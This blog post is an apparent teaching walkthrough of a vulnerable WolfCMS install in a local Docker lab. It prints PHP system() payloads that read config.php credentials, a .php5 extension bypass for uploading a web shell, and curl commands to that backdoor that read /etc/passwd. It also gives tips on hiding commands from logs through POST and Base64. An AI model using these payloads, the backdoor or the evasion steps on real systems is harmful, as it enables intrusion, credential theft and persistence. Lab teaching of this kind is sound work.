In preparation for an ethical hacking class that I will be teaching, I
wanted to work through a few of the Vulnhub images to refresh my
knowledge on the tools that can be used. Also, to provide step-by-step
walk-through exercises that students can follow.
Previous Posts that can assist with this Walkthrough
1. Billu_b0x - Highlights a Local File Inclusion vulnerability
2. Seattle - Highlights Brute Forcing a Login and XSS
3. Zico2 - Highlights directory traversal and PHP Command Injection
4. Docker with WolfCMS and MySQL Images - Prerequisite for this post...
Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer
Kali Linux Distro VM (Downloaded the VM edition from kali.org)
1 - docker
2 - docker image called wolfcms/wolfcms
3 - docker image called mysql
4 - Create a MySQL user and Set a password for MySQL user
Disclosure of Vulnerabilities listed below. I disclosed the below vulnerabilities to WolfCMS on November 4, 2017 and November 13, 2017. I have received no response from them.
Lab
1.
After loading the docker images from the last post for MySQL and
WolfCMS the configuration for the WolfCMS was retained however the MySQL
configuration and information was not retained.
2.
Follow the previous lab to setup MySQL or find a different image so that
when you commit the changes they are retained. You can pull down an
ubuntu image and run "apt-get update; apt-get install net-tools
mysql-server zip wget"
3. After you login as the admin
from the URL http://172.17.0.2/?/admin/login you should see the
following page. For now we are going to work with the "About Us" page.
4.
Knowing from the setup of the web page that this is programmed in
PHP, we are going to try and get PHP code to execute in the body of this
"About Us" page.
String: <?php echo "test"; ?>
5. Notice that the "About Us" page interprets the PHP and returns the word "test". Sweet!
6.
I am going to try running system commands and capture the output and
display to the "About Us" page. The system command should be disabled.
Strings:
<?php
echo "\n\nLocal Info\n\n";
echo '<pre>';
system('pwd');
system('whoami');
system('ls -lha');
echo '</pre>';
?>
7.
Wow! That worked to pull back the present working directory (pwd), the
user the web server is running as, and the directory listing of the
active directory. We can execute shell commands through PHP as long as
the www-data user has access to do so.
8.
Normally in a configuration file you can find a username and password
to the database. Let's try and get the contents of the config.php
file. Let's add a command to cat the config.php file.
String: system('cat /var/www/html/wolfcms/config.php');
9. Looking at the "About Us" page to see the output of the information, shows that it probably did not work.
10.
Let's check the source of the page, by right-clicking on the page and
clicking, "view source". Notice that the config.php is actually
visible. We can see quickly that the database username and password are
displayed.
11.
We have the database credentials and we can execute PHP. Let's explore
the database using this information. Let's add the following PHP code
to connect to the database and return the results of the tables in the
database "wolf".
12. And the results are...
13. Let's not look inside of the user table, but first lets display the columns of the table.
14. And the results of the fields in the table user...
15. Now let's display the name, email, username, password and salt.
16. The results are displaying the password and the salt.
17.
Now with the above vulnerabilities you have full access to run any
command you like on the file system with the permissions of the www-data
user and full access to the database. Remember, with PHP code
execution you can insert and update records.
18. Really quick, stored XSS exists on this page also.
19.
The above vulnerabilities allow us to execute operating system
commands, steal cookies with stored XSS, query the database and much
more. However, to understand attackers, if the database does not
contain information that they can sell they are looking for a way to be
persistent to use the site in other ways. One way they gain persistence
is through a web shell. This allows you to execute commands and gather
results. For this first exercise we are going to upload a simple web
shell. Navigate to the file manager.
20.
On Kali, under the directory of /usr/share/webshells/php is a file
called simple-backdoor.php. If you read about this latest update, you
see that PHP file extensions were blocked from being uploaded. If you
attempt to upload simple-backdoor.php if will fail and not complete.
Sometimes as a penetration tester you need to look at the source code.
In
the source code, you can see that the extensions that are blocked are
.php, .php3, .php4, and .inc. However, as you identify other extensions
that it could be you could find that .php5 is not blocked. You can
copy the simple-backdoor.php file to now become simple-backdoor.php5 and
then the upload will succeed.
Command: cp /usr/share/webshells/php/simple-backdoor.php /usr/share/webshells/php/simple-backdoor.php5
21.
Before you uploaded the simple-backdoor.php5 file you should look at
the source code and understand what it is going to do. If you navigate
to the file that you uploaded you will see the following in the browser.
22.
The web shell allows you to execute any command that the www-data user
can with their privileges. I am going to run the command as shown to
display the contents of the /etc/passwd file.
23.
Remember that if you pass parameters in the URL, the parameters will
appear in the logs. I am going to modify the the backdoor script to be
read a POST parameter. I copied it to be sb-post.php5 and then uploaded
it.
24.
Now if you browse to the page you will not see anything showing in the
page. I am going to use curl to conduct a POST request with the command
that I would like to execute.
Command: curl -d "cmd=ls" -X POST http://172.17.0.2/public/sb-post.php5
25.
With the above backdoor I can return the output of the commands that I
would like to execute. Remember that you can chain commands together
also.
Command: curl -d "cmd=whoami;ls -lha;cat /etc/passwd" -X POST http://172.17.0.2/public/sb-post.php5
26.
With the backdoor you can see that the commands are in plain-text. You
may want to find a way to obfuscate or make it difficult for the string
to be identified. Malware and backdoors often use encryption to hide
commands sent and received. I am going to use Base64 Encoding to pass
the commands to the web shell. First let's modify the web shell to add
the decoding of a base64 encoded string.
27. Now, using bash to encode the command that we want sent, then using curl to send it, we receive the results.
28. Granted you probably want the output encoded as you receive it back from the web server.
Challenge: Change the output to be base64 encoded.
Challenge:
Write a python script that will read as input the command,
base64_encode it, send it, receive the results, and decode it. After
this process read as input another command.
Twitter: @lokut
This blog is for educational purposes only. The opinions expressed in this blog are my own and do not reflect the views of my employers.
Subscribe to:
Post Comments (Atom)
Test Authentication from Linux Console using python3 pexpect
Working with the IT420 lab, you will discover that we need to discover a vulnerable user account. The following python3 script uses the pex...
-
Here is a quick walk through of GetBoo. The first item that I found was you can harvest the usernames of the existing users that are regist...
-
As I was glancing through the logs of my honeypots I spent some time to look at the following logs. In the past I have just overlooked them...
-
I thought I would work through a few of these web applications provided by OWASP on their broken web applications VM. The first one I th...
-
Today looking at the logs of the honeypots, I became curious based on the whois of the IP Addresses attempting to login to SSH which country...
-
Recently I was doing some scanning with a tool that is available on github called masscan. The tool allows you to configure a configuration...
No comments:
Post a Comment